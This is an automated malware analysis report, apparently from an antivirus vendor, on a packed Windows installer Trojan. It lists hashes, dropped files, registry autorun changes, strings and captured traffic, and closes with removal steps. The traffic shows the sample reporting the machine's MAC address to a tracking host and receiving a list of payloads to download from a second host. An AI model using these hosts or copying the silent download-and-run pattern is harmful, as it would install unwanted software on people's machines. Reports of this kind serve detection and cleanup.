MD5: 65b966a98ffe2af8265d8c51986fb1c4
SHA1: 5a4eedaafd7e208ee7223a0fd657e9e53b255d95
SHA256: 2da986882887922b9e6666ad6b31e1408133d24cecbd2eff7ad129d32348cbed
SSDeep: 3072:tgXdZt9P6D3XJwFuPXwm9UpdfVlAqQjpt8udlfzt1sy2jVfXI:te34i2bUnTAqQjpt8GhSysQ
Size: 123703 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Applications Install
Created at: 2009-06-07 00:41:59
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:1256

File activity

The process %original file name%.exe:1256 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\xID.dll (10 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÉÁµçä¯ÀÀÆ÷\ÉÁµçä¯ÀÀÆ÷.lnk (517 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÉÁµçä¯ÀÀÆ÷\жÔØ ÉÁµçä¯ÀÀÆ÷.lnk (675 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\open.ini (669 bytes)
%Program Files%\shandian\Unins.exe (564 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F30241_s_0523.exe (18246 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\Md5dll.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Desktop\ÉÁµçä¯ÀÀÆ÷.lnk (505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\emaaif_70690.exe (13344 bytes)
%Program Files%\shandian\config.ini (194 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsf1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F30241_s_0523.exe (0 bytes)

Registry activity

The process %original file name%.exe:1256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÉÁµçä¯ÀÀÆ÷]
"DisplayName" = "ÉÁµçä¯ÀÀÆ÷ 1.1.0.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÉÁµçä¯ÀÀÆ÷]
"Publisher" = "а汸ÓÃ.nsi_nsis-2.45_76861_776315"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÉÁµçä¯ÀÀÆ÷]
"DisplayIcon" = "%Program Files%\shandian\Unins.exe"
"UninstallString" = "%Program Files%\shandian\Unins.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÉÁµçä¯ÀÀÆ÷]
"DisplayVersion" = "1.1.0.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 A9 7F 4A C8 17 A2 04 FB 3B 70 76 57 1B 01 D3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"shandian" = "%Program Files%\shandian\shandian.exe"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: MeinV
Product Name: ?????
Product Version: 1.1.0.0
Legal Copyright: Corporation. All rights reserved.
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.1.0.0
File Description: Installer Application
Comments: http://www.sd.com
Language: English (United States)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://stat.huashui.org/stat/?v=1&ac=setup2&name=%original file name%.exe&mac=00-0C-29-FD-55-AD&md5=99be0fe99ecadbf4847eb7bfd64d76d7	112.124.102.171
down.icudi.org	222.186.60.2

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP Request on Unusual Port Possibly Hostile

Traffic

GET /stat/?v=1&ac=setup2&name=%original file name%.exe&mac=00-0C-29-FD-55-AD&md5=99be0fe99ecadbf4847eb7bfd64d76d7 HTTP/1.0

Host: stat.huashui.org

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 200 OK

Connection: close

Date: Sat, 31 May 2014 09:26:17 GMT

Server: Microsoft-IIS/6.0

Who: ShanIE

Content-Length: 3176

Content-Type: text/html

Set-Cookie: ASPSESSIONIDACSSDCBR=GCKPEGAAOMNIKEFIIDMEJIKO; path=/

Cache-control: private
..[s]..s=0..[Page1_1]..Task=down..Desc=..........Hint=..........Exe=F3
0241_s_0523.exe..URL=hXXp://down.icudi.org:99/F30241_s_0523.rar..reg=H
KLM\SOFTWARE\Baidu\BaiduSd\InstallDir..[Page1_2]..Task=down..Desc=....
......Hint=..........Exe=emaaif_70690.exe..URL=hXXp://down.icudi.org:9
9/emaaif_70690.rar..reg=HKLM\SOFTWARE\Baidu\BaiduAn\InstallDir..[Page1
_3]..Task=down..Desc=......Hint=......Exe=kuping_b_54282.exe..URL=http
://down.icudi.org:99/kuping_b_54282.rar..reg=HKCU\Software\Kuping\Inst
allPath..[Page1_4]..Task=down..Desc=..........Hint=..........Exe=pczh_
98_2.exe..URL=hXXp://down.icudi.org:99/pczh_98_2.rar..reg=HKLM\SOFTWAR
E\Microsoft\Windows\CurrentVersion\App Paths\Ainqngz3.9.exe\..[Page1_5
]..Task=down..Desc=........Hint=........Exe=-8853_1_mvy.exe..URL=http:
//down.icudi.org:99/-8853_1_mvy.rar..reg=HKLM\SOFTWARE\Mnying\Mnyingfi
ledir..[Page1_6]..Task=down..Desc=...... ..Hint=........Exe=yxku_s[106
].exe..URL=hXXp://down.icudi.org:99/yxku_s[106].rar..reg=HKCU\Software
\yxkuBox\InstallPath..[Page1_7]..Task=down..Desc=......Hint=......Exe=
xkss_50041.exe..URL=hXXp://down.icudi.org:99/xkss_50041.rar..reg=HKCU\
Software\xuankusoso\InstallMode..[Page1_9]..Task=down..Desc=....FM..Hi
nt=....FM..Exe=setup_3128.exe..URL=hXXp://down.icudi.org:99/setup_3128
.rar..reg=HKLM\SOFTWARE\YYMusic3\rd..[Page1_11]..Task=down..Desc=.....
.....Hint=..........Exe=BaiduPlayerNetSetup_284.exe..URL=hXXp://down.i
cudi.org:99/BaiduPlayerNetSetup_284.rar..reg=HKLM\SOFTWARE\MozillaPlug
ins\@baidu.com/npxbdyy\Path..[Page1_12]..Task=down..Desc=.........
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

verifying installer: %d%%

http://nsis.sf.net/NSIS_Error

... %d%%

~nsu.tmp

%u.%u%s%s

RegDeleteKeyExA

%s=%s

*?|<>/":

\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp

open.ini

.reloc

WS2_32.dll

NSISdl.dll

invalid URL

Host: %s

GET %s HTTP/1.0

User-Agent: NSISDL/1.2 (Mozilla)

http=

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Unable to open %s

%skB (%d%%) of %skB at %u.
ukB/s

(%u hours remaining)

(%u minutes remaining)

(%u seconds remaining)

Downloading %s

.vN {

nsu2.tmp

.exe&mac=00-0C-29-FD-55-AD&md5=99be0fe99ecadbf4847eb7bfd64d76d7

1.1.0.0

//down.icudi.org:99/emaaif_70690.rar

%original file name%.exe

c:\%original file name%.exe

%Program Files%\shandian

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf1.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

emaaif_70690.exe

http://down.icudi.org:99/emaaif_70690.rar

,Wc%c

%SM"3

I.rHUJr

he.BFY^

Nullsoft Install System v2.45

%Documents and Settings%\%current user%\Desktop\

http://www.sd.com

1.1.0.0

%original file name%.exe_1256_rwx_10004000_00001000:

callback%d

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\xID.dll (10 bytes)
   %Documents and Settings%\%current user%\Start Menu\Programs\ÉÁµçä¯ÀÀÆ÷\ÉÁµçä¯ÀÀÆ÷.lnk (517 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\NSISdl.dll (14 bytes)
   %Documents and Settings%\%current user%\Start Menu\Programs\ÉÁµçä¯ÀÀÆ÷\жÔØ ÉÁµçä¯ÀÀÆ÷.lnk (675 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\open.ini (669 bytes)
   %Program Files%\shandian\Unins.exe (564 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\F30241_s_0523.exe (18246 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\Md5dll.dll (8 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\System.dll (11 bytes)
   %Documents and Settings%\%current user%\Desktop\ÉÁµçä¯ÀÀÆ÷.lnk (505 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\emaaif_70690.exe (13344 bytes)
   %Program Files%\shandian\config.ini (194 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   "shandian" = "%Program Files%\shandian\shandian.exe"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.